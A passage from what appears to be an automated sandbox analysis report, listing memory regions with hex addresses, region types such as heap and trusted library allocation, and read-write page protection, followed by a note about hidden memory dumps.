|
stack
|
page read and write
|
||
|
15DEF7AA000
|
heap
|
page read and write
|
||
|
15DEF822000
|
heap
|
page read and write
|
||
|
1C756205000
|
heap
|
page read and write
|
||
|
7FFD3478A000
|
trusted library allocation
|
page read and write
|
||
|
1C756158000
|
heap
|
page read and write
|
||
|
15D8195E000
|
trusted library allocation
|
page read and write
|
||
|
15D81C0A000
|
trusted library allocation
|
page read and write
|
||
|
1C7560E0000
|
heap
|
page read and write
|
||
|
15D8177C000
|
trusted library allocation
|
page read and write
|
||
|
1C75613C000
|
heap
|
page read and write
|
||
|
15D812C2000
|
trusted library allocation
|
page read and write
|
||
|
1C7561C9000
|
heap
|
page read and write
|
||
|
15D81818000
|
trusted library allocation
|
page read and write
|
||
|
15DEFA40000
|
heap
|
page read and write
|
||
|
15D81C66000
|
trusted library allocation
|
page read and write
|
||
|
1C7561BA000
|
heap
|
page read and write
|
||
|
15DED849000
|
heap
|
page read and write
|
||
|
15D819FA000
|
trusted library allocation
|
page read and write
|
||
|
15D80D62000
|
trusted library allocation
|
page read and write
|
||
|
15D81A97000
|
trusted library allocation
|
page read and write
|
||
|
15D81BD1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
1C757FCE000
|
heap
|
page read and write
|
||
|
15DEF940000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
15D81CC0000
|
trusted library allocation
|
page read and write
|
||
|
15DED891000
|
heap
|
page read and write
|
There are 272 hidden memdumps, click here to show them.